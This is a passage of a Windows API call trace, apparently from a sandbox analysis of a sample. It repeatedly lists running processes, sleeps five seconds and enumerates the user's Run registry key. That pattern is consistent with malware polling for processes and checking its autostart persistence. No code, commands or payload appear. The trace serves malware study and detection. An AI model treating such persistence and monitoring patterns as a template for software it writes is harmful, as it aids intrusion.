RegionSize=0x14e624*=0x20000) returned 0x0 [0181.368] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.370] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.370] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.382] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.382] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.382] NtClose (Handle=0x154) returned 0x0 [0181.382] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.382] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.383] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.383] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.383] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.386] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.386] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.397] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.397] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.397] NtClose (Handle=0x154) returned 0x0 [0181.397] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.398] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.399] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.399] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.399] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.402] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.402] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.413] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.413] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.413] NtClose (Handle=0x154) returned 0x0 [0181.413] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.413] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.414] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.414] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.415] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.417] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.417] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.431] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.431] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.431] NtClose (Handle=0x154) returned 0x0 [0181.431] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.432] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.432] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.433] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.433] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.435] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.435] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.445] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.446] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.446] NtClose (Handle=0x154) returned 0x0 [0181.446] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.446] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.447] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.447] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.447] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.449] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.450] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.459] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.460] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.460] NtClose (Handle=0x154) returned 0x0 [0181.460] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.461] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.461] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.461] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.463] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.464] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.475] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.475] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.475] NtClose (Handle=0x154) returned 0x0 [0181.475] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.476] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.476] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.476] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.477] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.479] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.480] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.491] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.491] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.491] NtClose (Handle=0x154) returned 0x0 [0181.491] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.491] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.492] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.492] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.492] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.494] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.495] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.506] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.506] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.507] NtClose (Handle=0x154) returned 0x0 [0181.507] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.507] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.507] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.508] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.508] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.510] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.511] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.522] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.522] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.522] NtClose (Handle=0x154) returned 0x0 [0181.522] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.522] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.523] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.523] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.523] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.526] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.526] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.538] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.538] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.538] NtClose (Handle=0x154) returned 0x0 [0181.538] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.539] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.539] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.539] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.541] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.542] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.553] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.553] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.553] NtClose (Handle=0x154) returned 0x0 [0181.553] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.554] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.554] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.554] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.555] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.557] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.557] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.569] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.569] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0181.569] NtClose (Handle=0x154) returned 0x0 [0181.569] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0181.569] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0181.570] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0181.570] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0181.571] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0181.573] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0181.574] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0181.584] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0181.584] NtEnumerateValueKey (in: 